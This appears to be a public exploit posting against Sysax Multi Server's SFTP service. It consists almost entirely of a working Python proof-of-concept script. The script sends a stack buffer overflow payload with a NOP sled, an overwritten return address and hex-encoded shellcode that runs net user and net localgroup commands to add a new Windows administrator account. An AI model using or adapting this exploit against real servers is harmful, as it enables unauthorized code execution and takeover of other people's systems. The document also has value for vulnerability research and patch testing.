Sysax Multi Server Add Administrator

`Assuming the server is running as admin the overflow can actually be used to execute arbitrary code. In our example we spawn an instance of cmd.exe and create a new admin, Billyboy, with a password of woot.   
  
This has been tested with Windows XP SP2.   
  
+-------- Start Exploit --------+  
  
import paramiko  
import sys   
  
t_ip = "192.168.1.104" #target IP  
t_port = 4019 #target port  
password = "asdf" #Known user  
username = "asdf" #password for user  
  
transport = paramiko.Transport((t_ip, t_port))  
transport.connect(username = username, password = password)  
sftp = paramiko.SFTPClient.from_transport(transport)  
  
sftp.chdir("./") #Execute a good command  
buff_pen = "\x90" * 389  
buff_pen += "\x65\x82\xa5\x7c" #Point EIP to JMP ESP command in shell32.dll  
buff_pen += "\x90" * 3  
buff_pen += "\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00" #Shellcode to make a new admin, billyboy, with a password of 'woot'  
buff_pen += "\x90" * 3  
buff_pen += "\xcc" * (800 - len(buff_pen))  
sftp.get(buff_pen)  
  
+-------- Stop Exploit --------+  
`